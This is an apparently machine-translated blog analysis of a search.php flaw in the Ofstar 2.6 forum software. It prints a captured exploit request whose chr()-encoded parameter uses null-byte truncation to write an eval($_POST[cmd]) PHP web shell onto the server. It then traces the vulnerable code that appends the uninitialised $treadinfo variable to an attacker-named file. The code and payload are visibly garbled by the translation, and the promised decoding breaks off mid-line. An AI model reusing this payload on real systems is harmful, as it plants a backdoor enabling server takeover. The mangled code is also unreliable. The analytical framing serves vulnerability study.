A Simple Analysis of Ofsatr 2.6 Search Vulnerability

I saw similar tools on the Internet, but I couldn't find the analysis articles. I heard from Tom that there was a hacker's manual. Unfortunately, I didn't even have a magazine. So I captured the packets and read the code, I gave a rough analysis. This vulnerability is clever and classic :)

GET/search. php? Keyword = By % 20CN911 & cachefile = an85.php % 2500 & treadinfo = <〈? Fputs (fop En (chr (46 ). chr (47 ). chr (46 ). chr (46 ). chr (47 ). chr (46 ). chr (46 ). chr (47 ). chr (98 ). chr (98 ). chr (1, 115 ). chr (1, 100 ). chr (97 ). chr (1, 116 ). chr (97 ). chr (47 ). chr (99 ). chr (1, 110 ). chr (57 ). chr (49 ). chr (49 ). chr (46 ). chr (1, 112 ). chr (1, 104 ). chr (112), w), chr (60 ). chr (63 ). chr (32 ). chr (1, 101 ). chr (1, 118 ). chr (97 ). chr (1, 108 ). chr (40 ). chr (36 ). chr (95 ). chr (80 ). chr (79 ). chr (83 ). chr (84 ). chr (91 ). chr (99 ). chr (1, 109 ). chr (1, 100 ). chr (93 ). chr (41 ). chr (59 ). chr (63 ). chr (62) )? & Gt; HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash ,*/* Accept-Language: zh-cn Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 127.0.0.1

This is the file I captured. From the file I captured, we can see that there are three variables: $ keyword, $ cachefile, and $ treadinfo. $ Keyword can be any keyword. $ cachefile must be a PHP file, which is followed by our php shell. % 2500 is a % 00 truncation character. $ treadinfo is the trojan code generated, I didn't decode it, but I guess it was the PHP code to write a Trojan horse into another PHP file.
PS: $ treadinfo content decoding is as follows:

& Treadinfo = <〈? Fputs (fop The above is the analysis of packet capture. Let's take a look at the seach. PHP code and find out where the vulnerability is. The code for line N is as follows: $ Cachefile = rawurldecode ($ cachefile );

The rawurldecode function decodes the encoded URL string and decodes the URL string of $ keyword and $ cachefile respectively. Rawurldecode is also one of the key functions. After % 00 is packaged by rawurldecode, you can skip GPC = ON under <PHP5.0.
The code for line N + N is as follows:

..................... $ Keywordarray = explode ("│", $ keyword ); $ Keycount = count ($ keywordarray ); If ($ sch_area = "C "){ Include './require/schall. php '; } Elseif ($ sch_area = ""){ For ($ j = 0; $ j <$ keycount; $ j ++ ){ $ Keywordarray [$ j]. = "|";/* accurately match the search author */ } Include './require/schpart. php '; } Else { Include './require/schpart. php '; } If (! File_exists ("userdata/cache/$cachefile.txt ")){ Showmsg ("NO content you are looking for <br> <a href = 'search. php '> follow-up search </a> </li> </ul> 〉"); } ...............................

The schall. php or schpart. php file is called here. The code for the last line of the two files schall. php and schpart. php is as follows:
If ($ treadinfo)
Writeover ("./userdata/cache/$cachefile.txt", $ treadinfo, "AB ");
Therefore, no matter which file is called, you can write the content of treadinfo to the cache file. Because the variable $ treadinfo is not initialized, you can customize SHELL code, while $ cachefile can customize a PHP file, use % 00 to truncate the TXT file later. So this line of code is to write the Trojan to the PHP file.
The general process of this vulnerability has been clarified because I have read the code in the internet cafe and I have not tested it in detail. Some of the details are not pointed out. If there is an error, please point out. I also admire the observation of the vulnerability discoverer SAIY. It is indeed a very classic vulnerability :)